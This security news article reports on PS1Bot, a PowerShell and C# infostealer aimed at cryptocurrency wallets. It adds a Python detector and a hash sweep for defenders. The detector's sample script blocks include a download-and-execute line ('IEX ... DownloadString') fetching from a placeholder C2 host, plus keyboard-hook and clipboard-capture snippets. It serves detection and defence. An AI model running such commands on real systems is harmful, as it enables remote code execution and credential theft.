PS1Bot – Unpacking the New Multi-Stage Malware Campaign Targeting Windows Systems


Cisco Talos has identified a sophisticated new malware campaign targeting Windows systems with a multi-stage framework dubbed “PS1Bot,” which has been highly active throughout 2025.

This PowerShell and C#-based malware represents a significant evolution in information-stealing capabilities, specifically designed to target cryptocurrency wallets and sensitive financial data while maintaining stealth through in-memory execution techniques.

Advanced Modular Architecture Enables Multiple Attack Vectors

PS1Bot employs a modular design that allows attackers to deploy various specialized components based on their objectives. The framework includes modules for antivirus detection, screen capture, keylogging, information collection, and persistence establishment.

What sets PS1Bot apart is its emphasis on stealth – the malware minimizes persistent artifacts on infected systems by facilitating in-memory execution of modules without writing them to disk.

The initial infection vector leverages malvertising campaigns that direct victims to compressed archives with names designed for search engine optimization poisoning, such as “chapter 8 medicare benefit policy manual.zip” or “Counting Canadian Money Worksheets Pdf.zip.e49”.

Once executed, the malware establishes communication with its command-and-control (C2) servers, using the infected system’s drive serial number to construct unique URLs for C2 communications.

Cryptocurrency-Focused Information Theft Capabilities

The malware’s information stealer module demonstrates particularly sophisticated capabilities, targeting over 50 web browsers and numerous cryptocurrency-related browser extensions, including MetaMask, Ledger, Trust Wallet, and Coinbase.

PS1Bot also specifically hunts for locally installed cryptocurrency wallet applications such as Exodus, Electrum, and Atomic Wallet.

A notable feature is the implementation of embedded wordlists designed to identify files containing cryptocurrency wallet seed phrases and passwords.

These wordlists support multiple languages, including English and Czech variants, enabling the malware to scan file systems for sensitive information across diverse linguistic environments.

Connections to Previous Campaigns and Evolution

Security researchers have identified significant overlaps between PS1Bot and previously reported malware families. The framework shares architectural similarities with AHK Bot, particularly in C2 URL derivation methods and modular design approaches.

Additionally, infrastructure and code analysis reveals connections to the Skitnet malware family, suggesting possible shared development or operational resources.

The keylogging module employs dynamic C# compilation within PowerShell processes, using SetWindowsHookEx() to monitor keyboard and mouse events while also capturing clipboard contents. This demonstrates the malware’s comprehensive approach to data collection beyond traditional file-based theft.
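The behaviours described above (drive-serial-derived C2 URLs, in-memory execution of downloaded modules, dynamic C# compilation with SetWindowsHookEx, clipboard capture) all surface in PowerShell Script Block Logging (Event ID 4104) if it is enabled, even when nothing is written to disk. The following is an added detection example written for this article, not code from Talos or from the PS1Bot samples; the regexes are this example's own assumptions about how such activity would appear in logged script-block text, and the sample script blocks are constructed for illustration.

```python
import re

# Heuristics modelled on the behaviours described in the article (dynamic C#
# compilation with SetWindowsHookEx, clipboard capture, drive-serial-derived C2
# URLs, in-memory execution of downloaded modules). The regexes are this
# example's own assumptions about how that activity would appear in PowerShell
# Script Block Logging (Event ID 4104) text; they are not Talos signatures.
# A rule fires only when every pattern in its list matches the same block.
RULES = {
    "dynamic_csharp_keyboard_hook": [
        re.compile(r"Add-Type", re.I),
        re.compile(r"SetWindowsHookEx", re.I),
    ],
    "clipboard_capture": [
        re.compile(r"Get-Clipboard|GetClipboardData|Clipboard\]::GetText", re.I),
    ],
    "drive_serial_in_url": [
        re.compile(r"SerialNumber", re.I),
        re.compile(r"https?://", re.I),
    ],
    "download_and_execute_in_memory": [
        re.compile(r"DownloadString|Invoke-WebRequest|Invoke-RestMethod", re.I),
        re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    ],
}

# Constructed sample script blocks standing in for the ScriptBlockText field of
# 4104 events; none of these is taken from a real PS1Bot sample.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem -Path C:\\Logs -Filter *.log | Measure-Object",
    "Add-Type -TypeDefinition $src; [Native]::SetWindowsHookEx($idHook, $cb, $hMod, 0)",
    "$s = (Get-WmiObject Win32_DiskDrive).SerialNumber; $u = \"https://c2.example.invalid/$s\"",
    "IEX (New-Object Net.WebClient).DownloadString($u)",
    "$clip = Get-Clipboard; Add-Content -Path $out -Value $clip",
]


def scan_script_block(text):
    """Return the names of every rule whose patterns all match `text`."""
    return [name for name, pats in RULES.items() if all(p.search(text) for p in pats)]


def scan_log(blocks):
    """Scan a sequence of script-block texts; return one finding per flagged block."""
    findings = []
    for idx, text in enumerate(blocks):
        hits = scan_script_block(text)
        if hits:
            findings.append({"line": idx, "rules": hits, "text": text})
    return findings


def summarize(findings):
    """Count how often each rule fired, for a quick triage view."""
    counts = {}
    for finding in findings:
        for rule in finding["rules"]:
            counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_SCRIPT_BLOCKS)
    for finding in results:
        print(f"block {finding['line']}: {', '.join(finding['rules'])}")
    print(summarize(results))
```

Each rule requires all of its patterns to co-occur in one script block, which keeps a lone `Add-Type` (common in legitimate administration) from firing; in production these checks would run over the ScriptBlockText field pulled from the PowerShell operational log rather than over the constructed list.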

PS1Bot’s persistence mechanism creates randomly named files in system directories and establishes startup entries to maintain access across system reboots.

The ongoing development activities observed throughout 2025 indicate this is a rapidly evolving threat that security teams should monitor closely for emerging variants and enhanced capabilities.

IOCs (SHA-256 hashes)

9304ff7136c030896973b0192c3ff02d47daaae9aa04db80a980df5c8eaffd91
5c983b71d035b05aba30778804bd6a2db6a9e00b1e186083813cf6ae513f89f6
943964e8eec89f1b8cb16c0cb813e0253529f47b60b2ecdef5afb4b0abd0d511
7377c7e3daa3c0d3cfd941c6cb0e27271dd2acbc0737c472b609861b0bf44a5f
14371c2993a31cdf39a8747a589e1eff365b7711a1d9fdfbc8b5273f397aa29e
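A minimal way to put the hashes above to use is to sweep a directory tree and compare each file's SHA-256 against the list. This is an added example written for this article, not tooling from Talos; the indicator set is copied exactly from the list above, and the file written by `self_check()` is constructed benign content used only to exercise the hashing path.

```python
import hashlib
import os
import tempfile

# SHA-256 indicators exactly as listed in the article.
PS1BOT_SHA256 = frozenset({
    "9304ff7136c030896973b0192c3ff02d47daaae9aa04db80a980df5c8eaffd91",
    "5c983b71d035b05aba30778804bd6a2db6a9e00b1e186083813cf6ae513f89f6",
    "943964e8eec89f1b8cb16c0cb813e0253529f47b60b2ecdef5afb4b0abd0d511",
    "7377c7e3daa3c0d3cfd941c6cb0e27271dd2acbc0737c472b609861b0bf44a5f",
    "14371c2993a31cdf39a8747a589e1eff365b7711a1d9fdfbc8b5273f397aa29e",
})


def sha256_of_file(path, chunk_size=1 << 20):
    """Hash a file in fixed-size chunks so large archives are not loaded into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_known_ioc(hex_digest):
    """Case-insensitive membership test against the published indicator list."""
    return hex_digest.strip().lower() in PS1BOT_SHA256


def scan_tree(root):
    """Walk `root` and return (path, digest) for every file matching an indicator."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_of_file(path)
            except OSError:
                continue  # unreadable or vanished file: skip it, do not abort the scan
            if is_known_ioc(digest):
                hits.append((path, digest))
    return hits


def self_check():
    """Write a constructed, benign file into a temp dir and scan it.

    Returns (chunked_hash_equals_one_shot_hash, hits); a correct run gives (True, []).
    """
    payload = b"constructed sample content, not a real artifact\n" * 4096
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "sample.bin")
        with open(path, "wb") as fh:
            fh.write(payload)
        chunked = sha256_of_file(path, chunk_size=1000)
        one_shot = hashlib.sha256(payload).hexdigest()
        return chunked == one_shot, scan_tree(tmp)


if __name__ == "__main__":
    print(self_check())
```

Because PS1Bot stages its modules in memory, file hashes will mostly catch the initial archive and whatever the persistence mechanism drops on disk, not the modules themselves; pair a hash sweep like this with PowerShell script block logging to cover the in-memory stages.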


Priya
Priya is a Security Reporter who tracks malware campaigns, exploit kits, and ransomware operations. Her reporting highlights technical indicators and attack patterns that matter to defenders.
